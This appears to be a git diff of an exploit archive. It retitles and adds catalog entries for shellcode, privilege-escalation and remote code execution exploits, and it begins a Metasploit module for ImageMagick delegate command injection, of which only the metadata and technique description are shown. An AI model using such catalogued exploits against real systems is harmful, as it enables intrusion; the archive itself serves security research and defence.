diff --git a/files.csv b/files.csv
index 3abd61c5a..06ed1a011 100755
--- a/files.csv
+++ b/files.csv
@@ -12058,7 +12058,7 @@ id,file,description,date,author,platform,type,port
 13645,platforms/windows/shellcode/13645.c,"JITed egg-hunter stage-0 shellcode",2010-03-20,"Alexey Sintsov",windows,shellcode,0
 13647,platforms/windows/shellcode/13647.txt,"win32/xp sp3 (Ru) WinExec+ExitProcess cmd shellcode 12 bytes",2010-03-24,"lord Kelvin",windows,shellcode,0
 13648,platforms/win32/shellcode/13648.rb,"Shellcode - Win32 MessageBox (Metasploit)",2010-03-24,corelanc0d3r,win32,shellcode,0
-13649,platforms/windows/shellcode/13649.txt,"JITed egg-hunter stage-0 shellcode Adjusted universal for xp/vista/win7",2010-03-27,"Alexey Sintsov",windows,shellcode,0
+13649,platforms/windows/shellcode/13649.txt,"JITed egg-hunter stage-0 shellcode Adjusted universal for XP/Vista/Windows 7",2010-03-27,"Alexey Sintsov",windows,shellcode,0
 13661,platforms/linux/shellcode/13661.txt,"linux x86 - nc -lvve/bin/sh -p13377 shellcode",2010-04-02,anonymous,linux,shellcode,0
 13669,platforms/linux/shellcode/13669.c,"chmod(_/etc/shadow__ 0666) shellcode (36 bytes)",2010-04-14,Magnefikko,linux,shellcode,0
 13670,platforms/linux/shellcode/13670.c,"execve(_/bin/sh_) shellcode (25 bytes)",2010-04-14,Magnefikko,linux,shellcode,0
@@ -12253,7 +12253,7 @@ id,file,description,date,author,platform,type,port
 13902,platforms/asp/webapps/13902.txt,"Ananda Image Gallery SQL Vulnerability",2010-06-17,"L0rd CrusAd3r",asp,webapps,0
 13903,platforms/windows/remote/13903.py,"File Sharing Wizard 1.5.0 - (SEH) Exploit",2010-06-17,b0nd,windows,remote,0
 13904,platforms/php/webapps/13904.txt,"Planet 1.1 - [CSRF] Add Admin Account",2010-06-17,G0D-F4Th3r,php,webapps,0
-13905,platforms/windows/local/13905.py,"BlazeDVD 5.1- (.plf) Stack Buffer Overflow PoC Exploit - ALSR/DEP Bypass on Win7",2010-06-17,mr_me,windows,local,0
+13905,platforms/windows/local/13905.py,"BlazeDVD 5.1 - (.plf) Stack Buffer Overflow PoC Exploit (Windows 7 ALSR/DEP Bypass)",2010-06-17,mr_me,windows,local,0
 13906,platforms/novell/dos/13906.txt,"Netware SMB Remote Stack Overflow PoC",2010-06-17,"laurent gaffie",novell,dos,139
 13907,platforms/windows/local/13907.py,"Winamp 5.572 - Local BoF Exploit (EIP & SEH DEP Bypass)",2010-06-17,TecR0c,windows,local,0
 13908,platforms/lin_x86-64/shellcode/13908.c,"Linux/x86-64 - Disable ASLR Security - 143 bytes",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0
@@ -12390,7 +12390,7 @@ id,file,description,date,author,platform,type,port
 14062,platforms/php/webapps/14062.txt,"Joomla JE Event Calendar LFI Vulnerability",2010-06-26,Sid3^effects,php,webapps,0
 14063,platforms/php/webapps/14063.txt,"Joomla JE Job Component com_jejob - LFI Vulnerability",2010-06-26,Sid3^effects,php,webapps,0
 14064,platforms/php/webapps/14064.txt,"Joomla Component JE Section Finder LFI Vulnerability",2010-06-26,Sid3^effects,php,webapps,0
-14068,platforms/windows/local/14068.py,"Winamp 5.572 - Local BoF Exploit (Win7 ASLR and DEP Bypass)",2010-06-26,Node,windows,local,0
+14068,platforms/windows/local/14068.py,"Winamp 5.572 - Local BoF Exploit (Windows 7 ASLR and DEP Bypass)",2010-06-26,Node,windows,local,0
 14073,platforms/php/webapps/14073.txt,"2daybiz Matrimonial Script smartresult.php SQL Injection Vulnerability",2010-06-27,"Easy Laster",php,webapps,0
 14070,platforms/php/webapps/14070.txt,"Speedy 1.0 - Remote Shell Upload Vulnerability",2010-06-26,"ViRuS Qalaa",php,webapps,0
 14071,platforms/windows/dos/14071.pl,"FoxPlayer 2 - (.m3u) Local BoF PoC",2010-06-26,Madjix,windows,dos,0
@@ -12446,7 +12446,7 @@ id,file,description,date,author,platform,type,port
 14146,platforms/hardware/webapps/14146.txt,"Ubiquity Nanostation5 (Air OS) - Remote Command Execution (0day)",2010-06-30,emgent,hardware,webapps,80
 14147,platforms/php/webapps/14147.txt,"NinkoBB CSRF Vulnerability",2010-07-01,"ADEO Security",php,webapps,0
 14149,platforms/asp/webapps/14149.txt,"Setiran CMS Blind SQL Injection Vulnerability",2010-07-01,"Th3 RDX",asp,webapps,0
-14150,platforms/windows/local/14150.pl,"RM Downloader 3.1.3 - Local SEH Exploit (Win7 ASLR and DEP Bypass)",2010-07-01,Node,windows,local,0
+14150,platforms/windows/local/14150.pl,"RM Downloader 3.1.3 - Local SEH Exploit (Windows 7 ASLR and DEP Bypass)",2010-07-01,Node,windows,local,0
 14151,platforms/php/webapps/14151.pl,"Oxygen2PHP <= 1.1.3 (post.php) Blind SQL Injection Exploit",2010-07-01,Dante90,php,webapps,0
 14152,platforms/php/webapps/14152.pl,"Oxygen2PHP <= 1.1.3 (forumdisplay.php) Blind SQL Injection Exploit",2010-07-01,Dante90,php,webapps,0
 14153,platforms/windows/local/14153.pl,"Mediacoder 0.7.3.4682 - Universal Buffer Overflow (SEH)",2010-07-01,Madjix,windows,local,0
@@ -12498,7 +12498,7 @@ id,file,description,date,author,platform,type,port
 14206,platforms/php/webapps/14206.txt,"Esoftpro Online Contact Manager Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
 14207,platforms/php/webapps/14207.txt,"Joomla Phoca Gallery Component (com_phocagallery) SQL Injection Vulnerability",2010-07-04,RoAd_KiLlEr,php,webapps,0
 14210,platforms/php/webapps/14210.txt,"Joomla Front-edit Address Book Component (com_addressbook) Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
-14222,platforms/windows/remote/14222.py,"UFO: Alien Invasion 2.2.1 - BoF Exploit (Win7 ASLR and DEP Bypass)",2010-07-05,Node,windows,remote,0
+14222,platforms/windows/remote/14222.py,"UFO: Alien Invasion 2.2.1 - BoF Exploit (Windows 7 ASLR and DEP Bypass)",2010-07-05,Node,windows,remote,0
 14211,platforms/php/webapps/14211.txt,"Joomla NijnaMonials Component (com_ninjamonials) Blind SQL Injection Vulnerability",2010-07-04,Sid3^effects,php,webapps,0
 14213,platforms/php/webapps/14213.txt,"Joomla Component Sef (com_sef) - LFI Vulnerability",2010-07-05,_mlk_,php,webapps,0
 14214,platforms/php/webapps/14214.txt,"bbPress 1.0.2 - CSRF Change Admin Password",2010-07-05,saudi0hacker,php,webapps,0
@@ -15112,7 +15112,7 @@ id,file,description,date,author,platform,type,port
 17380,platforms/php/webapps/17380.txt,"Angora Guestbook 1.5 - Local File Inclusion",2011-06-10,"AutoSec Tools",php,webapps,0
 17381,platforms/windows/remote/17381.txt,"simple web-server 1.2 - Directory Traversal",2011-06-10,"AutoSec Tools",windows,remote,0
 17382,platforms/windows/webapps/17382.txt,"Tele Data Contact Management Server Directory Traversal",2011-06-10,"AutoSec Tools",windows,webapps,0
-17383,platforms/windows/local/17383.py,"The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow Exploit (Win7 + ASLR Bypass)",2011-06-11,xsploitedsec,windows,local,0
+17383,platforms/windows/local/17383.py,"The KMPlayer 3.0.0.1440 - (.mp3) Buffer Overflow Exploit (Windows 7 + ASLR Bypass)",2011-06-11,xsploitedsec,windows,local,0
 17456,platforms/windows/remote/17456.rb,"Citrix Provisioning Services 5.6 - streamprocess.exe Buffer Overflow",2011-06-27,metasploit,windows,remote,0
 17455,platforms/windows/dos/17455.rb,"Smallftpd 1.0.3 FTP Server Denial of Service Vulnerability",2011-06-27,"Myo Soe",windows,dos,0
 17387,platforms/windows/dos/17387.html,"UUSEE ActiveX < 6.11.0412.1 - Buffer Overflow Vulnerability",2011-06-11,huimaozi,windows,dos,0
@@ -15350,7 +15350,7 @@ id,file,description,date,author,platform,type,port
 17664,platforms/windows/dos/17664.py,"NSHC Papyrus 2.0 - Heap Overflow Vulnerability",2011-08-13,wh1ant,windows,dos,0
 17667,platforms/php/webapps/17667.php,"Contrexx Shopsystem <= 2.2 SP3 - Blind SQL Injection",2011-08-14,Penguin,php,webapps,0
 17669,platforms/windows/remote/17669.py,"Simple HTTPd 1.42 PUT Request Remote Buffer Overflow Vulnerability",2011-08-15,nion,windows,remote,0
-17672,platforms/windows/remote/17672.html,"Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)",2011-08-16,mr_me,windows,remote,0
+17672,platforms/windows/remote/17672.html,"Mozilla Firefox 3.6.16 - mChannel Object Use After Free Exploit (Windows 7)",2011-08-16,mr_me,windows,remote,0
 17673,platforms/php/webapps/17673.txt,"WordPress IP-Logger Plugin <= 3.0 - SQL Injection Vulnerability",2011-08-16,"Miroslav Stampar",php,webapps,0
 17674,platforms/php/webapps/17674.txt,"Joomla JoomTouch Component Local File Inclusion Vulnerability",2011-08-17,NoGe,php,webapps,0
 17675,platforms/php/webapps/17675.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection Vulnerability",2011-08-17,v3n0m,php,webapps,0
@@ -15755,7 +15755,7 @@ id,file,description,date,author,platform,type,port
 18129,platforms/php/webapps/18129.txt,"Blogs manager <= 1.101 SQL Injection Vulnerability",2011-11-19,muuratsalo,php,webapps,0
 18131,platforms/php/webapps/18131.txt,"ARASTAR - SQL Injection Vulnerability",2011-11-19,TH3_N3RD,php,webapps,0
 18134,platforms/windows/remote/18134.rb,"Viscom Software Movie Player Pro SDK ActiveX 6.8",2011-11-20,metasploit,windows,remote,0
-18137,platforms/win32/local/18137.rb,"QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS",2011-11-21,hellok,win32,local,0
+18137,platforms/win32/local/18137.rb,"QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR BYPASS",2011-11-21,hellok,win32,local,0
 18138,platforms/windows/remote/18138.txt,"VMware Update Manager Directory Traversal",2011-11-21,"Alexey Sintsov",windows,remote,0
 18140,platforms/windows/dos/18140.c,"Winows 7 keylayout - Blue Screen Vulnerability",2011-11-21,instruder,windows,dos,0
 18142,platforms/windows/local/18142.rb,"Free MP3 CD Ripper 1.1 - (WAV File) Stack Buffer Overflow",2011-11-22,metasploit,windows,local,0
@@ -31330,8 +31330,8 @@ id,file,description,date,author,platform,type,port
 34762,platforms/php/webapps/34762.txt,"WordPress Login Widget With Shortcode 3.1.1 - Multiple Vulnerabilities",2014-09-25,dxw,php,webapps,80
 34763,platforms/php/webapps/34763.txt,"OsClass 3.4.1 (index.php file param) - Local File Inclusion",2014-09-25,Netsparker,php,webapps,80
 34764,platforms/php/webapps/34764.txt,"Cart Engine 3.0 - Multiple Vulnerabilities",2014-09-25,"Quantum Leap",php,webapps,80
-34765,platforms/linux/remote/34765.txt,"GNU Bash - Environment Variable Command Injection (ShellShock)",2014-09-25,"Stephane Chazelas",linux,remote,0
-34766,platforms/linux/remote/34766.php,"Bash - Environment Variables Code Injection Exploit (ShellShock)",2014-09-25,"Prakhar Prasad & Subho Halder",linux,remote,80
+34765,platforms/linux/remote/34765.txt,"GNU Bash - Environment Variable Command Injection (Shellshock)",2014-09-25,"Stephane Chazelas",linux,remote,0
+34766,platforms/linux/remote/34766.php,"Bash - Environment Variables Code Injection Exploit (Shellshock)",2014-09-25,"Prakhar Prasad & Subho Halder",linux,remote,80
 34767,platforms/windows/dos/34767.py,"BS.Player 2.56 - (.m3u / .pls) File Processing Multiple Remote Denial of Service Vulnerabilities",2010-09-26,modpr0be,windows,dos,0
 34768,platforms/windows/remote/34768.c,"VirIT eXplorer 6.7.43 - 'tg-scan.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-09-27,anT!-Tr0J4n,windows,remote,0
 34769,platforms/php/webapps/34769.txt,"MySITE SQL Injection and Cross-Site Scripting Vulnerabilities",2010-09-27,MustLive,php,webapps,0
@@ -31430,7 +31430,7 @@ id,file,description,date,author,platform,type,port
 34876,platforms/php/webapps/34876.txt,"E-Gold Game Series: Pirates of The Caribbean Multiple SQL Injection Vulnerabilities",2009-08-27,Moudi,php,webapps,0
 34877,platforms/php/webapps/34877.txt,"DigiOz Guestbook 1.7.2 - 'search.php' Cross-Site Scripting Vulnerability",2009-08-26,Moudi,php,webapps,0
 34878,platforms/php/webapps/34878.txt,"StandAloneArcade 1.1 - 'gamelist.php' Cross-Site Scripting Vulnerability",2009-08-27,Moudi,php,webapps,0
-34879,platforms/linux/remote/34879.txt,"OpenVPN 2.2.29 - ShellShock Exploit",2014-10-04,"hobbily plunt",linux,remote,0
+34879,platforms/linux/remote/34879.txt,"OpenVPN 2.2.29 - Shellshock Exploit",2014-10-04,"hobbily plunt",linux,remote,0
 34881,platforms/linux/remote/34881.html,"Mozilla Firefox SeaMonkey <= 3.6.10 and Thunderbird <= 3.1.4 - 'document.write' Memory Corruption Vulnerability",2010-10-19,"Alexander Miller",linux,remote,0
 34882,platforms/php/webapps/34882.html,"sNews 1.7 - 'snews.php' Cross-Site Scripting and HTML Injection Vulnerabilities",2010-10-19,"High-Tech Bridge SA",php,webapps,0
 34883,platforms/php/webapps/34883.txt,"4Site CMS 2.6 - 'cat' Parameter SQL Injection Vulnerability",2010-10-19,"High-Tech Bridge SA",php,webapps,0
@@ -31445,7 +31445,7 @@ id,file,description,date,author,platform,type,port
 34892,platforms/php/webapps/34892.txt,"pecio CMS 2.0.5 - 'target' Parameter Cross-Site Scripting Vulnerability",2010-10-21,"Antu Sanadi",php,webapps,0
 34893,platforms/php/webapps/34893.txt,"PHP Scripts Now Multiple Products bios.php rank Parameter XSS",2009-07-20,"599eme Man",php,webapps,0
 34894,platforms/php/webapps/34894.txt,"PHP Scripts Now Multiple Products bios.php rank Parameter SQL Injection",2009-07-20,"599eme Man",php,webapps,0
-34895,platforms/cgi/webapps/34895.rb,"Bash - CGI RCE Shellshock Exploit (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0
+34895,platforms/cgi/webapps/34895.rb,"Bash CGI - RCE Shellshock Exploit (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0
 34896,platforms/linux/remote/34896.py,"Postfix SMTP - Shellshock Exploit",2014-10-06,"Phil Blank",linux,remote,0
 34922,platforms/php/webapps/34922.txt,"Creative Contact Form - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0
 35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injection Vulnerabilities",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0
@@ -31678,7 +31678,7 @@ id,file,description,date,author,platform,type,port
 35143,platforms/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals 'PageId' Parameter SQL Injection Vulnerability",2010-12-28,"non customers",php,webapps,0
 35144,platforms/multiple/remote/35144.txt,"Appweb Web Server 3.2.2-1 - Cross-Site Scripting Vulnerability",2010-12-23,"Gjoko Krstic",multiple,remote,0
 35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 - 'range' Parameter SQL Injection Vulnerability",2010-12-27,Dr.NeT,php,webapps,0
-35146,platforms/php/webapps/35146.txt,"PHP 5.x (< 5.6.2) - Shellshock Exploit (Bypass disable_functions)",2014-11-03,"Ryan King (Starfall)",php,webapps,0
+35146,platforms/php/webapps/35146.txt,"PHP 5.x (< 5.6.2) - Bypass disable_functions (Shellshock Exploit)",2014-11-03,"Ryan King (Starfall)",php,webapps,0
 35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal Vulnerability",2010-12-24,anonymous,linux,remote,0
 35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting Vulnerability",2010-12-27,"Ulisses Castro",php,webapps,0
 35150,platforms/php/webapps/35150.php,"Drupal < 7.32 Pre Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443
@@ -31755,7 +31755,7 @@ id,file,description,date,author,platform,type,port
 35231,platforms/php/webapps/35231.txt,"Advanced Webhost Billing System 2.9.2 - 'oid' Parameter SQL Injection Vulnerability",2011-01-16,ShivX,php,webapps,0
 35232,platforms/linux/remote/35232.txt,"Pango Font Parsing 'pangoft2-render.c' Heap Corruption Vulnerability",2011-01-18,"Dan Rosenberg",linux,remote,0
 35233,platforms/multiple/webapps/35233.txt,"B-Cumulus 'tagcloud' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-01-18,MustLive,multiple,webapps,0
-35234,platforms/linux/local/35234.py,"OSSEC 2.8 - Privilege Escalation",2014-11-14,skynet-13,linux,local,0
+35234,platforms/linux/local/35234.py,"OSSEC 2.8 - hosts.deny Privilege Escalation",2014-11-14,skynet-13,linux,local,0
 35235,platforms/windows/local/35235.rb,"MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python",2014-11-14,metasploit,windows,local,0
 35236,platforms/windows/local/35236.rb,"MS14-064 Microsoft Windows OLE Package Manager Code Execution",2014-11-14,metasploit,windows,local,0
 35237,platforms/multiple/webapps/35237.txt,"Gogs (label pararm) - SQL Injection",2014-11-14,"Timo Schmid",multiple,webapps,80
@@ -33339,7 +33339,7 @@ id,file,description,date,author,platform,type,port
 36930,platforms/multiple/webapps/36930.txt,"WordPress Plugin Freshmail 1.5.8 - Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
 36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0
 36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 and 4.1.1 - Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900
-36933,platforms/linux/remote/36933.py,"ShellShock dhclient Bash Environment Variable Command Injection PoC",2014-09-29,fdiskyou,linux,remote,0
+36933,platforms/linux/remote/36933.py,"dhclient 4.1 - Bash Environment Variable Command Injection PoC (Shellshock)",2014-09-29,fdiskyou,linux,remote,0
 36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System listing.aspx searchText Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0
 36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System /help/helpredir.aspx guide Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0
 36936,platforms/asp/webapps/36936.txt,"SAP Business Objects InfoView System /webi/webi_modify.aspx id Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0
@@ -33660,7 +33660,7 @@ id,file,description,date,author,platform,type,port
 37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 Mod_Copy Command Execution",2015-06-10,metasploit,linux,remote,0
 37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80
 37264,platforms/php/webapps/37264.txt,"WordPress Encrypted Contact Form Plugin 1.0.4 - CSRF Vulnerability",2015-06-10,"Nitin Venkatesh",php,webapps,80
-37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
+37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - _diff_ Command Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
 37267,platforms/windows/dos/37267.py,"foobar2000 1.3.8 (.m3u) Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
 37268,platforms/windows/dos/37268.py,"GoldWave 6.1.2 Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
 37292,platforms/linux/local/37292.c,"Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayfs Local Root (Shell)",2015-06-16,rebel,linux,local,0
@@ -34565,7 +34565,7 @@ id,file,description,date,author,platform,type,port
 38262,platforms/osx/dos/38262.txt,"OS X Regex Engine (TRE) - Integer Signedness and Overflow Issues",2015-09-22,"Google Security Research",osx,dos,0
 38263,platforms/osx/dos/38263.txt,"OS X Regex Engine (TRE) - Stack Buffer Overflow",2015-09-22,"Google Security Research",osx,dos,0
 38264,platforms/osx/dos/38264.txt,"Apple qlmanage - SceneKit::daeElement::setElementName Heap Overflow",2015-09-22,"Google Security Research",osx,dos,0
-38265,platforms/win32/dos/38265.txt,"Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) #2",2015-09-22,"Nils Sommer",win32,dos,0
+38265,platforms/win32/dos/38265.txt,"Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (2)",2015-09-22,"Nils Sommer",win32,dos,0
 38266,platforms/win32/dos/38266.txt,"Windows Kernel - DeferWindowPos Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win32,dos,0
 38267,platforms/win32/dos/38267.txt,"Windows Kernel - UserCommitDesktopMemory Use-After-Free (MS15-073)",2015-09-22,"Nils Sommer",win32,dos,0
 38268,platforms/win32/dos/38268.txt,"Windows Kernel - Pool Buffer Overflow Drawing Caption Bar (MS15-061)",2015-09-22,"Nils Sommer",win32,dos,0
@@ -34969,7 +34969,6 @@ id,file,description,date,author,platform,type,port
 38687,platforms/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field SEH Overflow",2015-11-12,"Nipun Jaswal",windows,dos,0
 38688,platforms/php/webapps/38688.txt,"b374k Web Shell - CSRF Command Injection",2015-11-13,hyp3rlinx,php,webapps,0
 38689,platforms/php/webapps/38689.txt,"SilverStripe 'MemberLoginForm.php' Information Disclosure Vulnerability",2013-08-01,"Fara Rustein",php,webapps,0
-38690,platforms/php/webapps/38690.html,"BigTree CMS Cross Site Request Forgery Vulnerability",2013-07-17,"High-Tech Bridge",php,webapps,0
 38691,platforms/cgi/webapps/38691.txt,"Kwok Information Server Multiple SQL Injection Vulnerabilities",2013-08-07,"Yogesh Phadtare",cgi,webapps,0
 38692,platforms/hardware/remote/38692.txt,"AlgoSec Firewall Analyzer Cross Site Scripting Vulnerability",2013-08-16,"Asheesh kumar Mani Tripathi",hardware,remote,0
 38693,platforms/php/webapps/38693.txt,"Advanced Guestbook 'addentry.php' Arbitrary Shell Upload Vulnerability",2013-08-08,"Ashiyane Digital Security Team",php,webapps,0
@@ -35121,7 +35120,7 @@ id,file,description,date,author,platform,type,port
 38846,platforms/multiple/remote/38846.txt,"nginx <= 1.1.17 URI Processing Security Bypass Vulnerability",2013-11-19,"Ivan Fratric",multiple,remote,0
 38847,platforms/windows/local/38847.py,"Acunetix WVS 10 - Local Privilege Escalation",2015-12-02,"Daniele Linguaglossa",windows,local,0
 38848,platforms/php/webapps/38848.php,"WordPress Suco Themes 'themify-ajax.php' Arbitrary File Upload Vulnerability",2013-11-20,DevilScreaM,php,webapps,0
-38849,platforms/cgi/remote/38849.rb,"Advantech Switch Bash Environment Variable Code Injection (Shellshock)",2015-12-02,metasploit,cgi,remote,0
+38849,platforms/cgi/remote/38849.rb,"Advantech Switch - Bash Environment Variable Code Injection (Shellshock)",2015-12-02,metasploit,cgi,remote,0
 38850,platforms/hardware/remote/38850.txt,"Thomson Reuters Velocity Analytics Remote Code Injection Vulnerability",2013-11-22,"Eduardo Gonzalez",hardware,remote,0
 38851,platforms/hardware/remote/38851.html,"LevelOne WBR-3406TX Router Cross Site Request Forgery Vulnerability",2013-11-15,"Yakir Wizman",hardware,remote,0
 38852,platforms/php/webapps/38852.pl,"phpThumb 'phpThumb.php' Arbitrary File Upload Vulnerability",2013-12-01,DevilScreaM,php,webapps,0
@@ -35380,8 +35379,8 @@ id,file,description,date,author,platform,type,port
 39118,platforms/php/webapps/39118.html,"osCmax 2.5 Cross Site Request Forgery Vulnerability",2014-03-17,"TUNISIAN CYBER",php,webapps,0
 39119,platforms/windows/remote/39119.py,"KiTTY Portable <= 0.65.0.2p - Chat Remote Buffer Overflow (SEH Windows XP/7/10)",2015-12-29,"Guillaume Kaddouch",windows,remote,0
 39120,platforms/windows/local/39120.py,"KiTTY Portable <= 0.65.1.1p Local Saved Session Overflow (Egghunter XP_ DoS 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
-39121,platforms/windows/local/39121.py,"KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Wow64 Egghunter Win7)",2015-12-29,"Guillaume Kaddouch",windows,local,0
-39122,platforms/windows/local/39122.py,"KiTTY Portable <= 0.65.0.2p Local kitty.ini Overflow (Win8.1/Win10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
+39121,platforms/windows/local/39121.py,"KiTTY Portable <= 0.65.0.2p - Local kitty.ini Overflow (Wow64 Egghunter Windows 7)",2015-12-29,"Guillaume Kaddouch",windows,local,0
+39122,platforms/windows/local/39122.py,"KiTTY Portable <= 0.65.0.2p - Local kitty.ini Overflow (Windows 8.1/Windows 10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
 39124,platforms/php/webapps/39124.txt,"MeiuPic 'ctl' Parameter Local File Include Vulnerability",2014-03-10,Dr.3v1l,php,webapps,0
 39125,platforms/windows/dos/39125.html,"Kaspersky Internet Security Remote Denial of Service Vulnerability",2014-03-20,CXsecurity,windows,dos,0
 39126,platforms/php/webapps/39126.txt,"BIGACE Web CMS 2.7.5 /public/index.php LANGUAGE Parameter Remote Path Traversal File Access",2014-03-19,"Hossein Hezami",php,webapps,0
@@ -35946,6 +35945,7 @@ id,file,description,date,author,platform,type,port
 39728,platforms/lin_x86-64/shellcode/39728.py,"Linux x64 - Bind Shell Shellcode Generator",2016-04-25,"Ajith Kp",lin_x86-64,shellcode,0
 39729,platforms/win32/remote/39729.rb,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (MSF)",2016-04-25,"Jonathan Smith",win32,remote,21
 39730,platforms/ruby/webapps/39730.txt,"NationBuilder Multiple Stored XSS Vulnerabilities",2016-04-25,LiquidWorm,ruby,webapps,443
+39731,platforms/windows/shellcode/39731.c,"Windows Null-Free Shellcode - Primitive Keylogger to File - 431 (0x01AF) bytes",2016-04-25,Fugu,windows,shellcode,0
 39733,platforms/linux/dos/39733.py,"Rough Auditing Tool for Security (RATS) 2.3 - Crash PoC",2016-04-25,"David Silveiro",linux,dos,0
 39734,platforms/linux/local/39734.py,"Yasr Screen Reader 0.6.9 - Local Buffer Overflow",2016-04-26,"Juan Sacco",linux,local,0
 39735,platforms/windows/remote/39735.rb,"Advantech WebAccess Dashboard Viewer Arbitrary File Upload",2016-04-26,metasploit,windows,remote,80
@@ -35993,3 +35993,13 @@ id,file,description,date,author,platform,type,port
 39778,platforms/windows/dos/39778.txt,"Adobe Flash - Use-After-Free When Rendering Displays From Multiple Scripts",2016-05-06,"Google Security Research",windows,dos,0
 39779,platforms/windows/dos/39779.txt,"Adobe Flash - MovieClip.duplicateMovieClip Use-After-Free",2016-05-06,"Google Security Research",windows,dos,0
 39780,platforms/jsp/webapps/39780.txt,"ManageEngine Applications Manager Build 12700 - Multiple Vulnerabilities",2016-05-06,"Saif El-Sherei",jsp,webapps,443
+39781,platforms/php/webapps/39781.txt,"Ajaxel CMS 8.0 - Multiple Vulnerabilities",2016-05-09,DizzyDuck,php,webapps,80
+39782,platforms/windows/local/39782.py,"i.FTP 2.21 - Host Address / URL Field SEH Exploit",2016-05-09,"Tantaryu MING",windows,local,0
+39783,platforms/windows/remote/39783.py,"Dell SonicWall Scrutinizer <= 11.0.1 - setUserSkin/deleteTab SQL Injection Remote Code Execution",2016-05-09,mr_me,windows,remote,0
+39784,platforms/php/webapps/39784.txt,"ZeewaysCMS - Multiple Vulnerabilities",2016-05-09,"Bikramaditya Guha",php,webapps,80
+39785,platforms/windows/dos/39785.cs,"ASUS Memory Mapping Driver (ASMMAP/ASMMAP64): Physical Memory Read/Write",2016-05-09,slipstream,windows,dos,0
+39786,platforms/windows/local/39786.txt,"Certec EDV atvise SCADA Server 2.5.9 - Privilege Escalation",2016-05-09,LiquidWorm,windows,local,0
+39788,platforms/windows/local/39788.txt,"Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2)",2016-05-09,hex0r,windows,local,0
+39789,platforms/windows/dos/39789.py,"RPCScan 2.03 - Hostname/IP Field SEH Overwrite PoC",2016-05-09,"Nipun Jaswal",windows,dos,0
+39791,platforms/multiple/local/39791.rb,"ImageMagick Delegate Arbitrary Command Execution",2016-05-09,metasploit,multiple,local,0
+39792,platforms/ruby/remote/39792.rb,"Ruby on Rails Development Web Console (v2) Code Execution",2016-05-09,metasploit,ruby,remote,3000
diff --git a/platforms/multiple/local/39791.rb b/platforms/multiple/local/39791.rb
new file mode 100755
index 000000000..18537b527
--- /dev/null
+++ b/platforms/multiple/local/39791.rb
@@ -0,0 +1,87 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'ImageMagick Delegate Arbitrary Command Execution',
+      'Description'     => %q{
+        This module exploits a shell command injection in the way "delegates"
+        (commands for converting files) are processed in ImageMagick versions
+        <= 7.0.1-0 and <= 6.9.3-9 (legacy).
+
+        Since ImageMagick uses file magic to detect file format, you can create
+        a .png (for example) which is actually a crafted SVG (for example) that
+        triggers the command injection.
+
+        Tested on Linux, BSD, and OS X. You'll want to choose your payload
+        carefully due to portability concerns. Use cmd/unix/generic if need be.
+      },
+      'Author'          => [
+        'stewie',            # Vulnerability discovery
+        'Nikolay Ermishkin', # Vulnerability discovery
+        'wvu',               # Metasploit module
+        'hdm'                # Metasploit module
+      ],
+      'References'      => [
+        %w{CVE 2016-3714},
+        %w{URL https://imagetragick.com/},
+        %w{URL http://seclists.org/oss-sec/2016/q2/205},
